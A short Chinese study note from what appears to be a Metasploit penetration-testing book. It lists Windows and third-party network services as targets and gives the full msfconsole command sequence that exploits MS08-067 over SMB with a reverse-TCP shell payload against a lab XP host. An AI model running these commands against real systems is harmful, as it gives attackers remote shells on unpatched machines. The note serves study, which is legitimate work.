了解缓冲区漏洞原理
Windows自带网络服务攻击
NetBIOS,137,138 SMB,139,445 MSRPC,135,139,445 RDP远程桌面,3389
Windows微软网络服务攻击
IIS,MSSQL,FTP,SMTP,DNS,WINS,EXCHANGE
Windowsd第三方服务攻击
Apache,IBM WebSphere,Tomcat,Oracle,Mysql,Serv-U,FileZilla
针对工业控制
了解即可
实操MS08-067过程
这是利用SMB445端口的漏洞,2K3可能我装的版本已经自带补丁,没有成功。XPSP3下成功
search ms08_067 //搜索有关ms08_67有关模块 use exploit/windows/smb/ms08_067_netapi //使用攻击模块 show paylaods //列出攻击载荷,就是shellcode set payload generic/shell_reverse_tcp //使用攻击载荷 show options //列出模块有关参数 set Rhost 192.168.2.245 //设置目标IP set lhost 192.196.2.249 //设置接收SHELL地址 show target 34 //选择攻击平台,这个要选对。否者会对目标主机的服务奔溃导致端口关闭。 exploit
MS08-067分析
篇幅问题,查看书本中#200页开始
了解源码含义,IDA静态跟OD动态定位漏洞位置
Oracle数据库
利用现用的模块,针对存在漏洞的exploit,自己修改适合的溢出返回地址及代码
具体实现#216页
Linux服务渗透
Linux因开源相对windows的漏洞较少。
而且版本较多,所以攻击模块有很多时候需要自己搭建对于的版本自己GDB调试修改
书中分析了编号为:CVE-2010-2063 页码为:#234